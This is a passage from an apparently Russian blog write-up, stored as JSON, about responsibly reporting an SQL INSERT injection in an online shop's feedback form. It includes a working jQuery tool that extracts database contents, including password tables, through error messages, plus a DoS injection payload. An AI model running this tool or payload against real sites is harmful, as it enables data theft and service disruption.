  \u0421\u0442\u0440\u0430\u043d\u0438\u0446\u0430 A.B.ru\/info\/about<\/a>, \u0444\u043e\u0440\u043c\u0430 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438.
  \u0415\u0441\u043b\u0438 \u0437\u0430\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0438\u043c\u044f \u0438 e-mail, \u0430 \u0432 \u0442\u0435\u043b\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0441\u0438\u043c\u0432\u043e\u043b \u043e\u0434\u0438\u043d\u0430\u0440\u043d\u043e\u0439 \u043a\u0430\u0432\u044b\u0447\u043a\u0438 (‘), \u0442\u043e \u043f\u043e\u0441\u043b\u0435 \u043d\u0430\u0436\u0430\u0442\u0438\u044f \u043d\u0430 \u00ab\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c\u00bb \u043d\u0430 \u044d\u043a\u0440\u0430\u043d\u0435 \u043d\u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0431\u0443\u0434\u0435\u0442 \u0432\u044b\u0432\u0435\u0434\u0435\u043d\u0430 \u043e\u0448\u0438\u0431\u043a\u0430 \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0439 \u0421\u0423\u0411\u0414. \u0415\u0441\u043b\u0438 \u0432\u0447\u0438\u0442\u0430\u0442\u044c\u0441\u044f \u0438 \u043e\u0442\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0442\u0435\u043a\u0441\u0442 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043b\u044e\u0431\u0443\u044e \u0445\u0440\u0430\u043d\u044f\u0449\u0443\u044e\u0441\u044f \u0432 \u0411\u0414 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e. <\/p>\n
  \u041f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u044e \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0443, \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0432\u0441\u0435 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0441\u0442\u043e\u043c \u043c\u043e\u0434\u0443\u043b\u0438\/\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0438 \u0437\u0430\u043a\u0440\u044b\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0439 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a \u043f\u0440\u043e\u0431\u043b\u0435\u043c.  <\/div>\n<\/div>\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b<\/p>\n
\u043e\u0442\u0432\u0435\u0442<\/b><\/p>\n
\u0414\u043e\u0431\u0440\u044b\u0439 \u0434\u0435\u043d\u044c, \u041c\u0430\u043a\u0441\u0438\u043c.<\/p>\n
  \u0421\u043f\u0430\u0441\u0438\u0431\u043e \u0437\u0430 \u0412\u0430\u0448\u0435 \u0437\u0430\u043c\u0435\u0447\u0430\u043d\u0438\u0435, \u0443\u0447\u0442\u0451\u043c<\/p>\n
  \u0421 \u0443\u0432\u0430\u0436\u0435\u043d\u0438\u0435\u043c,
  A B  <\/div>\n<\/div>\n
\u041f\u043e\u0434\u0443\u043c\u0430\u0432, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b<\/p>\n
\u0435\u0449\u0451 \u043e\u0434\u043d\u043e \u043f\u0438\u0441\u044c\u043c\u043e<\/b><\/p>\n
\u0415\u0441\u043b\u0438 \u043d\u0435 \u0432\u043e\u0437\u0440\u0430\u0436\u0430\u0435\u0442\u0435, \u044f \u0431\u044b \u043e\u043f\u0438\u0441\u0430\u043b \u0441\u0432\u043e\u0439 \u00ab\u0441\u043f\u043e\u0440\u0442\u0438\u0432\u043d\u044b\u0439 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u00bb \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 \u0431\u0435\u0437 \u0441\u0441\u044b\u043b\u043e\u043a \u043f\u0440\u044f\u043c\u044b\u0445 \u0438 \u043a\u043e\u0441\u0432\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u0441\u0430\u0439\u0442 \u0438 \u0444\u0438\u0440\u043c\u0443, \u0440\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f. \u0421\u043e\u043e\u0431\u0449\u0438\u0442\u0435 \u043f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043a\u043e\u0433\u0434\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430, \u043d\u0430 \u0432\u0441\u044f\u043a\u0438\u0439 \u0441\u043b\u0443\u0447\u0430\u0439.  <\/div>\n<\/div>\n
  \u0414\u0435\u043d\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439<\/b><\/p>\n
  \u041e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u0442\u043e\u0440\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u043d\u0435\u0442. \u041d\u0443 \u0438 \u043b\u0430\u0434\u043d\u043e. \u0420\u043e\u0432\u043d\u043e \u0447\u0435\u0440\u0435\u0437 \u0441\u0443\u0442\u043a\u0438 \u0437\u0430\u0448\u0451\u043b \u043d\u0430 \u0442\u0443 \u0436\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0441 \u0444\u043e\u0440\u043c\u043e\u0439 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438. \u0422\u0435\u043f\u0435\u0440\u044c \u0432 \u043f\u043e\u043b\u0435 \u0432\u0432\u043e\u0434\u0430 \u0444\u0438\u043b\u044c\u0442\u0440\u0443\u044e\u0442\u0441\u044f \u0432\u0441\u0435 \u0441\u043f\u0435\u0446. \u0441\u0438\u043c\u0432\u043e\u043b\u044b, \u0440\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u043d\u0430 \u0441\u0442\u043e\u0440\u043e\u043d\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u0430. \u0427\u0442\u043e \u0436, \u043c\u043e\u043b\u043e\u0434\u0446\u044b, \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f \u043d\u0430\u0434\u0435\u044f\u0442\u044c\u0441\u044f, \u0447\u0442\u043e \u044d\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0430 \u043d\u0430 \u0432\u0440\u0435\u043c\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u043e\u0448\u0438\u0431\u043e\u043a. \u0410 \u043f\u043e\u043a\u0430 \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u044c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u2014 \u0445\u043e\u0447\u0435\u0442\u0441\u044f \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0434\u043e \u043a\u043e\u043d\u0446\u0430.<\/p>\n
  \u041a\u0430\u043a \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0442\u0435\u043a\u0441\u0442\u0430 \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435 \u0432 \u043e\u0442\u0432\u0435\u0442\u0435 \u043e\u0442 MariaDB \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 32 \u0441\u0438\u043c\u0432\u043e\u043b\u0430. \u041f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0442\u0435\u043a\u0441\u0442 \u043d\u0430 \u0440\u0443\u0441\u0441\u043a\u043e\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u0443\u0434\u0438\u0442\u044c \u043b\u0438\u0448\u044c 16 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432. \u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043b \u043d\u0430 MySQL \u2014 \u0442\u043e \u0436\u0435 \u0441\u0430\u043c\u043e\u0435. \u0417\u043d\u0430\u0447\u0438\u0442, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043d\u0435 \u0432 32 \u0441\u0438\u043c\u0432\u043e\u043b\u0430, \u0430 \u0432 32 \u0431\u0430\u0439\u0442\u0430. \u0427\u0442\u043e \u0436, \u043f\u0435\u0440\u0435\u0434\u0435\u043b\u0430\u043b \u0443\u0442\u0438\u043b\u0438\u0442\u0443 ajax93t411<\/a>:  <\/p>\n
ajax93t411.js<\/b><\/p>\n
\n
var ANS_START = " '~",     ANS_STOP = "' SQL=",     ANS_LIM = 31;  function ajax93t411(start_from, lim, construct_req) {     start_from = start_from || 0;     lim = lim || 1; \/\/ Can be -1. -1 if for "while no Err"      function req(i, offset, callback) {         $.ajax({              \/\/-- All this params is for customization. Feel free             url: '\/cli\/feedback.php',             method: 'POST',             data: $.param({                 data_email: 'undefined',                 data_email_body: 'undefined',                 data_email_subject: '\u041e\u0431\u0440\u0430\u0442\u043d\u0430\u044f \u0441\u0432\u044f\u0437\u044c - A B',                 type: 'feedback',                 name: 'Test',                 mail: 'test@mailinator.com',                 phone: '',                 feedbacktext: construct_req(start_from, i, offset), \/\/ Don't forget about this function to include                 else: '',                 recipient: 'A@B.ru',                 btn: ''             }             \/\/---             ),             success: function(resp) {                 var answer = resp.substring(resp.indexOf(ANS_START) + ANS_START.length, resp.indexOf(ANS_STOP));                 if (answer == ANS_ERR) {                     callback(answer);                 } else {                     callback(null, answer);                 }             },             error: function(jqXHR, textStatus) {                 callback(textStatus);             }         });     }      function constructReq(i, full_answer, offset, next) {         req(i, offset, function(err, answer) {             if (err) return next(err, full_answer);              full_answer += answer;             if (answer.length > 0) {                 constructReq(i, full_answer, offset + answer.length, next);             } else {                 $('body').append('<p>'+ full_answer +'<\/p>'); \/\/ Include each new result into webpage of target site. Just for usability.                 next(null, full_answer);             }         });     }      function timesSeries(lim, i, results, callback) {         if (i < lim) {             constructReq(i, '', 1, function(err, answer) {                 if (err) return callback(err, results);                 results.push(answer);                 timesSeries(lim, i + 1, results, callback);             });         } else {             callback(null, results);         }     }      function untilErrSeries(i, results, callback) {         constructReq(i, '', 1, function(err, answer) {             if (err) return callback(err, results);             results.push(answer);             untilErrSeries(i + 1, results, callback);         });     }      function complete(err, results) {         if (err) console.error(err);         window.INJ_RESULTS = results; \/\/ Keep all results into the global variable. Just for usability.         console.log('Done');     }      $('body').append('<p><b>New Request!<\/b><\/p>');     if (lim > 0) {         timesSeries(lim, 0, [], complete);     } else { \/\/ lim < 0         untilErrSeries(0, [], complete);     } } <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u0422\u0435\u043f\u0435\u0440\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u043d\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u0442 \u043e\u0442 \u043a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u043d\u043e\u0439 \u0434\u043b\u0438\u043d\u044b, \u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0438\u0441\u043a\u0430\u0442\u044c \u043a\u043e\u043d\u0435\u0446 \u0441\u0442\u0440\u043e\u043a\u0438, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0435\u043d\u0430 \u043e\u0448\u0438\u0431\u043a\u0430 (\u0442.\u0435. \u043e\u0442\u0432\u0435\u0442 \u0441 \u0442\u0435\u043a\u0441\u0442\u043e\u043c \u043e\u0448\u0438\u0431\u043a\u0438 \u043d\u0435 \u0432 \u0442\u043e\u043c \u0444\u043e\u0440\u043c\u0430\u0442\u0435, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0435\u0433\u043e \u043e\u0436\u0438\u0434\u0430\u0435\u0442). \u0414\u0430, \u0447\u0443\u0442\u044c \u0431\u043e\u043b\u044c\u0448\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432. \u0417\u0430\u0442\u043e \u043d\u0435\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u0442\u0435\u043a\u0441\u0442\u0430\u043c\u0438 \u0432 \u043d\u0435 latin \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0430\u0445. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0438\u0437\u0431\u0430\u0432\u0438\u043b\u0441\u044f \u043e\u0442 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 async (\u043e\u043d\u0430 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0430 \u0434\u043b\u044f \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u0438 \u0430\u043f\u0440\u043e\u0431\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432). \u0410 \u0442\u0430\u043a \u0436\u0435 \u0434\u043e\u0431\u0430\u0432\u0438\u043b \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043d\u0435 \u0437\u0430\u0434\u0430\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0441\u0442\u0440\u043e\u043a \u0432 \u0442\u0430\u0431\u043b\u0438\u0446\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0443\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c, \u0430 \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0432\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0432\u0441\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 (\u0434\u043e \u043e\u0448\u0438\u0431\u043a\u0438). \u0410 \u0442\u0430\u043a \u0436\u0435 \u0434\u043e\u0431\u0430\u0432\u0438\u043b \u0432\u044b\u0432\u043e\u0434 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0440\u0430\u0431\u043e\u0442\u044b \u043f\u0440\u044f\u043c\u043e \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0441\u0430\u0439\u0442\u0430, \u0447\u0442\u043e\u0431\u044b \u043b\u0435\u0433\u0447\u0435 \u0431\u044b\u043b\u043e \u043f\u0440\u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c.<\/p>\n
  \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b \u043b\u0438 \u0443\u0436\u0430\u0441\u043d\u044b\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u0442\u0430\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438?<\/b><\/p>\n
  \u041a\u0430\u043a \u043c\u044b \u0443\u0436\u0435 \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0447\u0442\u043e-\u0442\u043e \u0432 \u0444\u0430\u0439\u043b \u0438\u043b\u0438 \u0447\u0438\u0442\u0430\u0442\u044c \u0438\u0437 \u043d\u0435\u0433\u043e \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0441\u044f \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0435\u0441\u0442\u044c \u043d\u0430 \u0442\u043e \u043f\u0440\u0430\u0432\u0430. \u0417\u0430\u0442\u043e \u0443 \u043d\u0430\u0441 \u0432 \u043a\u0430\u0440\u043c\u0430\u043d\u0435 \u0442\u0430\u0431\u043b\u0438\u0446\u044b \u0441 \u043f\u0430\u0440\u043e\u043b\u044f\u043c\u0438 \u0438 \u044d\u043b. \u0430\u0434\u0440\u0435\u0441\u0430\u043c\u0438 \u0432\u0441\u0435\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432. \u041b\u0438\u0447\u043d\u043e \u044f \u043f\u043e\u0434\u0431\u0438\u0440\u0430\u0442\u044c \u0438\u0445 \u0438 \u0432\u0445\u043e\u0434\u0438\u0442\u044c \u043d\u0430 \u0441\u0430\u0439\u0442 \u0434\u0430\u0436\u0435 \u043d\u0435 \u043f\u044b\u0442\u0430\u043b\u0441\u044f \u2014 \u043c\u043d\u0435 \u044d\u0442\u043e \u043d\u0438 \u043a \u0447\u0435\u043c\u0443. \u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043c\u043e\u0436\u043d\u043e \u043a\u043e\u043d\u0441\u0442\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0444\u0430\u043a\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0447\u0442\u0435\u043d\u0438\u044f \u043b\u044e\u0431\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438\u0437 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445, \u0430 \u0432 \u043d\u0430\u0448\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0438 \u0438\u0437 \u0441\u043e\u0441\u0435\u0434\u043d\u0435\u0439.
  \u0414\u0440\u0443\u0433\u0430\u044f \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u043c\u0430\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u2014 \u044d\u0442\u043e \u0430\u0442\u0430\u043a\u0430 DoS, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u043e\u0439:  <\/p>\n
' or updatexml(0, concat(0x7e,(select benchmark(10000000000000000000000000000000000000000000000, encode('hello', 'world')))), 0) or ' <\/code><\/pre>\n
  \u0427\u0435\u0440\u0435\u0437 \u043d\u0435\u0434\u0435\u043b\u044e<\/b><\/p>\n
  \u0420\u0435\u0448\u0438\u043b \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c  <\/p>\n
\u0435\u0449\u0451 \u043e\u0434\u043d\u043e \u043f\u0438\u0441\u044c\u043c\u043e<\/b><\/p>\n
\u0414\u043e\u0431\u0440\u044b\u0439 \u0434\u0435\u043d\u044c.<\/p>\n
  \u0412\u044b \u0436\u0435 \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u0442\u0435, \u0447\u0442\u043e \u0442\u0435\u043a\u0443\u0449\u0430\u044f \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0430 \u043d\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438?  <\/div>\n<\/div>\n
  \u041e\u0442\u0432\u0435\u0442\u0430 \u043a\u0430\u043a \u0438 \u0440\u0430\u043d\u044c\u0448\u0435 \u043d\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u043e. <\/p>\n
  P.S.: \u0421\u0442\u0430\u0442\u044c\u044f \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u0447\u0435\u0440\u0435\u0437 13 \u0434\u043d\u0435\u0439 \u0441 \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u043d\u0430 \u0441\u0432\u044f\u0437\u044c \u043d\u0435 \u0432\u044b\u0445\u043e\u0434\u044f\u0442.     \t<\/p>\n
<\/div>\n
 \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438  http:\/\/habrahabr.ru\/post\/264579\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
     \t<\/a>
  \u0414\u0430\u0432\u043d\u043e \u043d\u0430 \u0425\u0430\u0431\u0440\u0435 \u043d\u0435 \u0437\u0432\u0443\u0447\u0430\u043b\u0438 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u043f\u0440\u043e SQL injection. \u0410 \u0443\u0436 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u043e\u0432 \u0438\u0437 \u0436\u0438\u0437\u043d\u0438 \u043f\u0440\u043e SQL INSERT injection \u0432\u043e\u043e\u0431\u0449\u0435 \u043e\u0447\u0435\u043d\u044c \u043c\u0430\u043b\u043e. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u0441\u0432\u043e\u044e.<\/p>\n
\u041b\u0438\u0440\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u0432\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435<\/b><\/p>\n
\u041b\u0438\u0440\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u0432\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435<\/b><\/p>\n
  \u0412\u0441\u0451 \u043d\u0430\u0447\u0430\u043b\u043e\u0441\u044c \u0441 \u043c\u043e\u0435\u0433\u043e \u0436\u0435\u043b\u0430\u043d\u0438\u044f \u043a\u0443\u043f\u0438\u0442\u044c \u0441\u0435\u0431\u0435 \u043d\u0435\u0447\u0442\u043e \u043d\u0435\u0434\u0435\u0448\u0451\u0432\u043e\u0435 \u0432 \u0440\u0430\u0437\u0431\u043e\u0440\u043d\u043e\u043c \u0432\u0438\u0434\u0435 \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0435 A.B.ru \u0444\u0438\u0440\u043c\u044b B. \u041f\u043e\u0441\u043b\u0435 \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0441 \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u043e\u043c \u043f\u043e \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u0435, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u0441\u044b\u043b\u043a\u0438 \u0438 \u043e\u0431\u0437\u043e\u0440\u0430 \u0435\u0451 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u0435\u0442\u0438\u0437\u043e\u0432 \u043e\u0447\u0435\u043d\u044c \u043d\u0435 \u0445\u0432\u0430\u0442\u0430\u0435\u0442. \u041f\u043e\u043b\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0447\u043d\u044f \u0432\u0441\u0435\u0433\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0433\u043e \u043d\u0435 \u0431\u044b\u043b\u043e, \u043b\u0438\u0448\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u0431\u043e\u043b\u0442\u043e\u0432, \u0433\u0430\u0435\u043a \u0438 \u0448\u0430\u0439\u0431. \u042f \u043d\u0430\u0447\u0430\u043b \u0441\u0431\u043e\u0440\u043a\u0443, \u0434\u043e\u0439\u0434\u044f \u0434\u043e \u0442\u043e\u0433\u043e \u043c\u0435\u0441\u0442\u0430, \u0433\u0434\u0435 \u0431\u0435\u0437 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u0431\u043e\u043b\u0442\u043e\u0432 \u0443\u0436\u0435 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043e\u0431\u043e\u0439\u0442\u0438\u0441\u044c. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043c\u043d\u043e\u044e \u0431\u044b\u043b\u043e \u0441\u043a\u0443\u0440\u043f\u0443\u043b\u0451\u0437\u043d\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u043c\u0435\u0442\u0438\u0437\u043e\u0432 \u0438 \u0432\u044b\u0441\u043b\u0430\u043d\u043e \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u043c \u043f\u0438\u0441\u044c\u043c\u043e\u043c \u0442\u043e\u0439 \u0436\u0435 \u0434\u0435\u0432\u0443\u0448\u043a\u0435-\u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u0443, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u044b \u043e\u0431\u0449\u0430\u043b\u0438\u0441\u044c. \u041a \u0447\u0435\u0441\u0442\u0438 \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u0441\u0442\u043e\u0438\u0442 \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0441\u0451 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0435 \u0431\u044b\u043b\u043e \u0432\u044b\u0441\u043b\u0430\u043d\u043e \u0432\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u0441\u044b\u043b\u043a\u043e\u0439. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u043d\u0430\u0447\u0430\u043b \u0441\u0431\u043e\u0440\u043a\u0443, \u0437\u0430\u0433\u043e\u043d\u044f\u044f \u0432 \u0434\u0430\u043b\u044c\u043d\u0438\u0439 \u0443\u0433\u043e\u043b \u0441\u0432\u043e\u0435\u0433\u043e \u0440\u0430\u0437\u0443\u043c\u0430 \u043e\u043f\u0430\u0441\u0435\u043d\u0438\u044f \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0447\u0442\u043e-\u0442\u043e \u0435\u0449\u0451. \u041d\u043e, \u0434\u043e\u0439\u0434\u044f \u0434\u043e \u0444\u0438\u043d\u0438\u0448\u043d\u043e\u0439 \u043f\u0440\u044f\u043c\u043e\u0439, \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 1\/4-\u043e\u0439 \u0447\u0430\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u043d\u0435 